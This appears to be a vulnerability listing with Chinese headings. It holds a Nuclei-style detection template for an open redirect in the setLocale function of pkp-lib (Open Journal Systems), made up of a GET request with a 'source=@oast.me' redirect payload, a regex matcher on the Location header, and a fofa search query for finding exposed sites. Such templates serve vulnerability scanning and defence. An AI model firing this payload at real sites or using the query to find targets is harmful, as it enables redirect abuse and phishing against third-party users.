漏洞描述
Public Knowledge Project pkp-lib is vulnerable to Open redirect due to a lack of input sanitization in the setLocale function.
pkp-lib-open-redirect: Open Journal Systems pkp-lib - Open Redirect
PoC代码[已公开]
id: pkp-lib-open-redirect
info:
name: Open Journal Systems pkp-lib - Open Redirect
author: ritikchaddha
severity: medium
description: |
Public Knowledge Project pkp-lib is vulnerable to Open redirect due to a lack of input sanitization in the setLocale function.
reference:
- https://github.com/pkp/pkp-lib/issues/7575
classification:
cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: public_knowledge_project
product: open_journal_systems
fofa-query: body="pkp-lib"
tags: pkp,ojs,open-journal-system,pkp-lib,redirect,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php/index/user/setLocale/NEW_LOCALE?source=@oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*){{Hostname}}@?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$'
# digest: 4b0a00483046022100cfbe05c4773a175d3ff4fab8c3d78d5ea39deeadfe6a31b6c764c15288c56a22022100a09f24027d57e14b8d1f8ac53ab368175541f2297ecc5a47d2030eda1c9d0b54:922c64590222798bb761d5b6d8e72950